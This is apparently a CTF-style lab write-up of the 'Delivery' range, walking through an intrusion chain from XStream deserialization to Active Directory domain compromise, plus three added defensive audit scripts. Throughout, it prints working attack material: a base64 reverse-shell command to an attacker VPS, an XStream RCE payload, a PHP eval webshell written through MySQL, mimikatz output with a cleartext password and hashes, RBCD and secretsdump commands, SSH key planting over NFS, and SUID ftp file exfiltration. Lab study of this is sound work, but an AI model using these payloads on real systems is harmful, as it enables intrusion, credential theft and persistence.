春秋云境·Delivery

Key points:

  • XStream RCE
  • MySQL weak password + writing a webshell
  • ACL Admins group writing RBCD
  • Linux: writing an SSH public key to connect
  • NFS exploitation
  • FTP privilege escalation

The home page has nothing on it, so scan it

./fscan -h 39.99.135.35
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 39.99.135.35    is alive
[*] Icmp alive hosts len is: 1
39.99.135.35:80 open
39.99.135.35:8080 open
39.99.135.35:21 open
39.99.135.35:22 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://39.99.135.35       code:200 len:10918  title:Apache2 Ubuntu Default Page: It works
[+] ftp://39.99.135.35:21:anonymous 
   [->]1.txt
   [->]pom.xml
[*] WebTitle: http://39.99.135.35:8080  code:200 len:3655   title:公司发货单

There is an FTP service that allows anonymous login, so connect to it

1.txt contains nothing; pom.xml:

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.7.2</version>
        <relativePath/> <!-- lookup parent from repository -->
    </parent>
    <groupId>com.example</groupId>
    <artifactId>ezjava</artifactId>
    <version>0.0.1-SNAPSHOT</version>
    <name>ezjava</name>
    <description>ezjava</description>
    <properties>
        <java.version>1.8</java.version>
    </properties>
    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-thymeleaf</artifactId>
        </dependency>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>

        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-test</artifactId>
            <scope>test</scope>
        </dependency>

        <dependency>
            <groupId>com.thoughtworks.xstream</groupId>
            <artifactId>xstream</artifactId>
            <version>1.4.16</version>
        </dependency>

        <dependency>
            <groupId>commons-collections</groupId>
            <artifactId>commons-collections</artifactId>
            <version>3.2.1</version>
        </dependency>
    </dependencies>

    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
        </plugins>
    </build>

</project>

From the dependency list the XStream vulnerability is obvious; just follow the existing write-up

https://github.com/vulhub/vulhub/blob/master/xstream/CVE-2021-29505/README.zh-cn.md

Open port 1099 on your VPS, then start the listener with ysoserial:

java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzUueHgueHgueHgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}"

Then listen on the reverse-shell port and send the PoC to the site

POST /just_sumbit_it HTTP/1.1
Host: 39.99.135.35:8080
Content-Length: 3119
Accept: application/xml, text/xml, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Content-Type: application/xml;charset=UTF-8
Origin: http://39.99.135.35:8080
Referer: http://39.99.135.35:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,vi;q=0.7
Content-Type: application/xml
Connection: close


<java.util.PriorityQueue serialization='custom'>
    <unserializable-parents/>
    <java.util.PriorityQueue>
        <default>
            <size>2</size>
        </default>
        <int>3</int>
        <javax.naming.ldap.Rdn_-RdnEntry>
            <type>12345</type>
            <value class='com.sun.org.apache.xpath.internal.objects.XString'>
                <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
            </value>
        </javax.naming.ldap.Rdn_-RdnEntry>
        <javax.naming.ldap.Rdn_-RdnEntry>
            <type>12345</type>
            <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
                <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
                    <parsedMessage>true</parsedMessage>
                    <soapVersion>SOAP_11</soapVersion>
                    <bodyParts/>
                    <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
                        <attachmentsInitialized>false</attachmentsInitialized>
                        <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                            <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
                                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
                                    <names>
                                        <string>aa</string>
                                        <string>aa</string>
                                    </names>
                                    <ctx>
                                        <environment/>
                                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
                                            <java.rmi.server.RemoteObject>
                                                <string>UnicastRef</string>
                                                <string>VPS_IP</string>
                                                <int>1099</int>
                                                <long>0</long>
                                                <int>0</int>
                                                <long>0</long>
                                                <short>0</short>
                                                <boolean>false</boolean>
                                            </java.rmi.server.RemoteObject>
                                        </registry>
                                        <host>VPS_IP</host>
                                        <port>1099</port>
                                    </ctx>
                                </candidates>
                            </aliases>
                        </nullIter>
                    </sm>
                </message>
            </value>
        </javax.naming.ldap.Rdn_-RdnEntry>
    </java.util.PriorityQueue>
</java.util.PriorityQueue>

Then wget fscan and Stowaway, the usual pair for working the internal network

start infoscan
(icmp) Target 172.22.13.14    is alive
(icmp) Target 172.22.13.6     is alive
(icmp) Target 172.22.13.28    is alive
(icmp) Target 172.22.13.57    is alive
[*] Icmp alive hosts len is: 4
172.22.13.28:80 open
172.22.13.57:80 open
172.22.13.57:22 open
172.22.13.14:80 open
172.22.13.14:22 open
172.22.13.14:21 open
172.22.13.6:445 open
172.22.13.6:139 open
172.22.13.28:445 open
172.22.13.28:139 open
172.22.13.6:135 open
172.22.13.28:135 open
172.22.13.14:8080 open
172.22.13.28:8000 open
172.22.13.28:3306 open
172.22.13.6:88 open
[*] alive ports len is: 16
start vulscan
[*] NetInfo:
[*]172.22.13.28
   [->]WIN-HAUWOLAO
   [->]172.22.13.28
[*] NetInfo:
[*]172.22.13.6
   [->]WIN-DC
   [->]172.22.13.6
[*] WebTitle: http://172.22.13.14       code:200 len:10918  title:Apache2 Ubuntu Default Page: It works
[*] NetBios: 172.22.13.6     [+]DC XIAORANG\WIN-DC          
[*] WebTitle: http://172.22.13.28       code:200 len:2525   title:欢迎登录OA办公平台
[*] NetBios: 172.22.13.28    WIN-HAUWOLAO.xiaorang.lab           Windows Server 2016 Datacenter 14393 
[*] WebTitle: http://172.22.13.57       code:200 len:4833   title:Welcome to CentOS
[*] WebTitle: http://172.22.13.28:8000  code:200 len:170    title:Nothing Here.
[+] ftp://172.22.13.14:21:anonymous 
   [->]1.txt
   [->]pom.xml
[*] WebTitle: http://172.22.13.14:8080  code:200 len:3655   title:公司发货单
[+] mysql:172.22.13.28:3306:root 123456

172.22.13.28 has a weak MySQL password; start a global proxy and connect to it with Navicat

Checking secure_file_priv shows it is empty, so files can be written to the server

show variables like "secure_file_priv";

Looking at the log settings shows the service is run by phpstudy, which is good news: it runs with very high privileges, usually SYSTEM as soon as you connect, so no UDF privilege escalation is needed

show variables like "%general%";
select "<?php eval($_POST[1]);?>" into outfile "C:/phpstudy_pro/WWW/1.php";

Connect to the webshell

Then grab the flag from the usual place

Then create a user and RDP in

net user fushuling qwer1234! /add
net localgroup administrators fushuling /add

BloodHound shows that the user zhangwen is in the ACL Admins group and has WriteDacl over WIN-DC, so it can write attributes, for example to set up DCSync or RBCD. But first dump credentials to get this user's password

mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" "exit" > test.txt
Authentication Id : 0 ; 219475 (00000000:00035953)
Session           : Service from 0
User Name         : chenglei
Domain            : XIAORANG
Logon Server      : WIN-DC
Logon Time        : 2023/10/4 16:46:14
SID               : S-1-5-21-3269458654-3569381900-10559451-1105
	msv :	
	 [00000003] Primary
	 * Username : chenglei
	 * Domain   : XIAORANG
	 * NTLM     : 0c00801c30594a1b8eaa889d237c5382
	 * SHA1     : e8848f8a454e08957ec9814b9709129b7101fad7
	 * DPAPI    : 89b179dc738db098372c365602b7b0f4
	tspkg :	
	wdigest :	
	 * Username : chenglei
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : chenglei
	 * Domain   : XIAORANG.LAB
	 * Password : Xt61f3LBhg1
	ssp :	
	credman :	

Then it's just an RBCD attack. I didn't take screenshots at the time, so I can only recover the commands from history

proxychains python3 addcomputer.py xiaorang.lab/chenglei:'Xt61f3LBhg1' -dc-ip 172.22.13.6 -dc-host xiaorang.lab -computer-name 'TEST$' -computer-pass 'P@ssw0rd'
proxychains python3 rbcd.py xiaorang.lab/chenglei:'Xt61f3LBhg1' -dc-ip 172.22.13.6 -action write -delegate-to 'WIN-DC$' -delegate-from 'TEST$'
proxychains python3 getST.py xiaorang.lab/'TEST$':'P@ssw0rd' -spn cifs/WIN-DC.xiaorang.lab -impersonate Administrator -dc-ip 172.22.13.6
export KRB5CCNAME=Administrator@cifs_WIN-DC.xiaorang.lab@XIAORANG.LAB.ccache

Then add the DC to /etc/hosts, and you can connect without a password

proxychains python3 psexec.py Administrator@WIN-DC.xiaorang.lab -k -no-pass -dc-ip 172.22.13.6
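
The RBCD write above changes a single attribute on the DC's computer object, msDS-AllowedToActOnBehalfOfOtherIdentity, which stores a self-relative Windows security descriptor whose DACL lists the accounts allowed to delegate to that object. The following added example (my code, not from this write-up or from the impacket scripts) parses such a descriptor and returns the trustee SIDs, so a defender who reads the raw attribute from every domain controller over LDAP can diff it against an expected set (for a DC, normally empty). The descriptor builder exists only to construct sample input offline; the RID 1601 for the TEST$ machine account is a constructed value under the domain SID visible in the mimikatz output.

```python
"""Audit msDS-AllowedToActOnBehalfOfOtherIdentity (RBCD) trustees on a computer object.

Added example, not part of the original write-up. The attribute is a self-relative
SECURITY_DESCRIPTOR; the accounts allowed to delegate are the SIDs in its DACL.
"""
import struct

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00

# Domain SID taken from the mimikatz output in the write-up; RID 1601 is constructed.
DOMAIN_SID = "S-1-5-21-3269458654-3569381900-10559451"
CONSTRUCTED_TEST_COMPUTER_SID = DOMAIN_SID + "-1601"


def sid_to_bytes(sid):
    """Encode an S-1-... string as a binary SID (revision, count, authority, sub-authorities)."""
    parts = sid.split("-")
    if parts[0] != "S" or int(parts[1]) != 1:
        raise ValueError("unsupported SID: %s" % sid)
    authority = int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([1, len(subs)]) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(blob, offset):
    """Decode a binary SID at offset; returns (sid_string, end_offset)."""
    revision, count = blob[offset], blob[offset + 1]
    authority = int.from_bytes(blob[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<%dI" % count, blob, offset + 8)
    end = offset + 8 + 4 * count
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs)), end


def build_rbcd_descriptor(trustee_sids):
    """Build a minimal self-relative SD granting each SID full control (sample input only).

    Real descriptors also carry owner/group SIDs; the parser follows the DACL offset
    from the header, so it does not depend on this exact layout.
    """
    aces = b""
    for sid in trustee_sids:
        sid_blob = sid_to_bytes(sid)
        ace_size = 8 + len(sid_blob)  # type, flags, size, mask = 8 bytes, then the SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, ace_size, 0x000F01FF) + sid_blob
    # ACL header: revision 4 (ACL_REVISION_DS), sbz1, size, ace count, sbz2
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(trustee_sids), 0) + aces
    # SD header: revision, sbz1, control, owner/group/sacl offsets (0 = absent), dacl offset
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE, 0, 0, 0, 20)
    return header + acl


def rbcd_trustees(blob):
    """Return the SID of every ACCESS_ALLOWED ACE in the descriptor's DACL."""
    revision, _, control, _, _, _, dacl_off = struct.unpack_from("<BBHIIII", blob, 0)
    if revision != 1 or not control & SE_DACL_PRESENT or dacl_off == 0:
        return []
    _, _, _acl_size, ace_count, _ = struct.unpack_from("<BBHHH", blob, dacl_off)
    pos = dacl_off + 8
    sids = []
    for _ in range(ace_count):
        ace_type, _, ace_size, _mask = struct.unpack_from("<BBHI", blob, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sid, _ = bytes_to_sid(blob, pos + 8)
            sids.append(sid)
        pos += ace_size  # skip ACE types we do not interpret
    return sids


def audit_rbcd(blob, expected_sids):
    """Trustees not in the expected set; on a DC object any entry is a finding."""
    return sorted(set(rbcd_trustees(blob)) - set(expected_sids))


if __name__ == "__main__":
    sample = build_rbcd_descriptor([CONSTRUCTED_TEST_COMPUTER_SID])
    print("trustees:", rbcd_trustees(sample))
    print("unexpected:", audit_rbcd(sample, expected_sids=[]))
```

In a real environment the blob comes from an LDAP read of the DC's computer object; resolving each SID back to a sAMAccountName shows whether it is a service account that is supposed to be there or a machine account created minutes earlier, as in the write-up. With Directory Service Changes auditing enabled, the modification itself is also logged as Security event 5136 on the DC, with the attribute name in the event body.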

Then I made a dumb mistake: thinking one flag was left, I dumped hashes to move laterally, but the last flag was on the CentOS machine, which isn't in the domain. The commands from that time are given anyway

proxychains python3 secretsdump.py -k -no-pass WIN-DC.xiaorang.lab -dc-ip 172.22.60.8

I got the hashes, but they were useless here

Administrator:500:aad3b435b51404eeaad3b435b51404ee:6341235defdaed66fb7b682665752c9a:

Back to the Linux server. Since we got in through a reverse shell, running commands is awkward and there is no persistence, so I wrote an ssh-keygen public key into root's home directory and then connected with the private key.

First create an RSA key pair on the local machine

ssh-keygen -t rsa -b 4096

The generated key pair lands in /home/fushuling/.ssh/; the content of /home/fushuling/.ssh/id_rsa.pub is the public key we need to write

On the reverse shell, run:

cd /root
mkdir .ssh

Then push the public key in

echo "<public key contents>" >> /root/.ssh/authorized_keys

Back on the local machine, we can now connect with the private key

Of course, we could also save the id_rsa contents and connect with Xshell, which is what I did afterwards

The challenge says there is an NFS service, which is the CentOS box. First update the packages on the machine we are connected to, otherwise the required command isn't available

sudo sed -i 's/archive.ubuntu.com/mirrors.aliyun.com/g' /etc/apt/sources.list
sudo apt-get update
apt-get install nfs-common -y

Then mount the share under the root directory

cd /
mkdir temp
mount -t nfs 172.22.13.57:/ ./temp -o nolock

After mounting, only the home directory is accessible. Write a public key again and we can connect to the CentOS machine

ssh-keygen -t rsa -b 4096
cd /temp/home/joyce/
mkdir .ssh
cat /root/.ssh/id_rsa.pub >> /temp/home/joyce/.ssh/authorized_keys
python3 -c 'import pty;pty.spawn("/bin/bash")'
ssh -i /root/.ssh/id_rsa joyce@172.22.13.57
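
The mount above works because the CentOS host exports its filesystem to this network and lets a root client create files inside a user's home directory. The following added example (my code, not from the write-up) parses an /etc/exports file and flags the settings that make that possible: an export open to any client, a writable export, an export of the whole filesystem, and no_root_squash, which keeps the client's uid 0 instead of mapping it to the anonymous user. The exports content is constructed for the demo and is not the lab's real configuration.

```python
"""Flag risky entries in /etc/exports.

Added example, not part of the original write-up. The sample file is constructed.
With root_squash (the default), a root user on an NFS client is mapped to the
anonymous uid and cannot write into /home/<user>/.ssh on the share; the
combination of rw, no_root_squash and a wildcard client removes that barrier.
"""
import re

SAMPLE_EXPORTS = """\
# constructed sample, not the lab's real file
/        *(rw,sync,no_root_squash)
/srv/pub 172.22.13.0/24(ro,sync)
/home    172.22.13.14(rw,sync,root_squash,no_subtree_check)
"""

CLIENT_SPEC = re.compile(r"([^(]*)(?:\((.*)\))?")


def parse_exports(text):
    """Return a list of (path, client, options) tuples, one per client spec."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        path = parts[0]
        for spec in parts[1:]:
            m = CLIENT_SPEC.fullmatch(spec)
            client = m.group(1) or "*"  # a bare "(opts)" applies to every host
            opts = set(filter(None, (m.group(2) or "").split(",")))
            entries.append((path, client, opts))
    return entries


def export_findings(text):
    """Return [(path, client, [problems])] for every entry with at least one problem."""
    findings = []
    for path, client, opts in parse_exports(text):
        problems = []
        if client == "*":
            problems.append("exported to any host")
        if "rw" in opts:
            problems.append("writable")
        if "no_root_squash" in opts:
            problems.append("no_root_squash: client root stays root on the share")
        if path == "/":
            problems.append("exports the entire filesystem")
        if problems:
            findings.append((path, client, problems))
    return findings


if __name__ == "__main__":
    for path, client, problems in export_findings(SAMPLE_EXPORTS):
        print("%s -> %s: %s" % (path, client, "; ".join(problems)))
```

The fix on the server side is the mirror image of the findings: export only the directory that needs sharing, restrict the client list to the hosts that need it, keep root_squash (or use all_squash for shares that hold user home directories), and make the export read-only where writes are not required.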

Once in, there is a flag in the root directory but no permission to read it, and a user account that isn't much use, so look at how to escalate

find / -user root -perm -4000 -exec ls -ldb {} \;

ftp stands out immediately: it is SUID, so we can upload the flag to an FTP server. The FTP service on the first machine we compromised doesn't allow uploads, so we start another one

python3 -m pyftpdlib -p 6666 -u test -P test -w &

Then connect to it (note: use the internal IP)

ftp 172.22.13.14 6666
put /flag02.txt

Then connect from outside and the uploaded flag is there
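
The find command above is the same check a defender should run on a schedule: the escalation only worked because a binary that has no business being setuid (ftp) carried the bit. The following added example (my code, not from the write-up) walks a tree for setuid files and diffs the result against a known-good baseline, so an addition like ftp shows up by itself. The demo builds a constructed directory tree in a temporary location so it runs without root; on a real host you would pass "/" and owner_uid=0 to match the -user root filter used in the write-up.

```python
"""Setuid inventory with a baseline diff.

Added example, not part of the original write-up. The demo tree is constructed
in a temporary directory; the file names and modes are chosen for illustration.
"""
import os
import stat
import tempfile


def find_setuid(root, owner_uid=None):
    """Relative paths of regular files under root with the setuid bit set.

    owner_uid=0 restricts the result to root-owned binaries, the ones that matter
    for privilege escalation.
    """
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)  # lstat: do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_ISUID:
                continue
            if owner_uid is not None and st.st_uid != owner_uid:
                continue
            hits.append(os.path.relpath(full, root))
    return sorted(hits)


def diff_against_baseline(found, baseline):
    """(added, removed): setuid files not in the baseline, and baseline entries now missing."""
    return sorted(set(found) - set(baseline)), sorted(set(baseline) - set(found))


def demo():
    """Build a constructed tree: passwd (expected setuid), ftp (unexpected setuid), ls (normal)."""
    with tempfile.TemporaryDirectory() as root:
        for rel, mode in [("usr/bin/passwd", 0o4755), ("usr/bin/ftp", 0o4755), ("usr/bin/ls", 0o755)]:
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as fh:
                fh.write(b"#!/bin/sh\n")
            os.chmod(full, mode)  # setting setuid on a file you own needs no privilege
        found = find_setuid(root)
        return found, diff_against_baseline(found, ["usr/bin/passwd"])


if __name__ == "__main__":
    found, (added, removed) = demo()
    print("setuid files:", found)
    print("unexpected:", added, "missing:", removed)
```

Store the baseline from a freshly built host, rerun the inventory periodically, and treat anything in the added list as an incident until explained; mounting user-writable filesystems with nosuid closes the door the same way for files dropped there.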

Looking at x1r0z's write-up, the NFS service here apparently allows direct privilege escalation (NFS privilege escalation), but since I already went the SUID route, I'll skip it
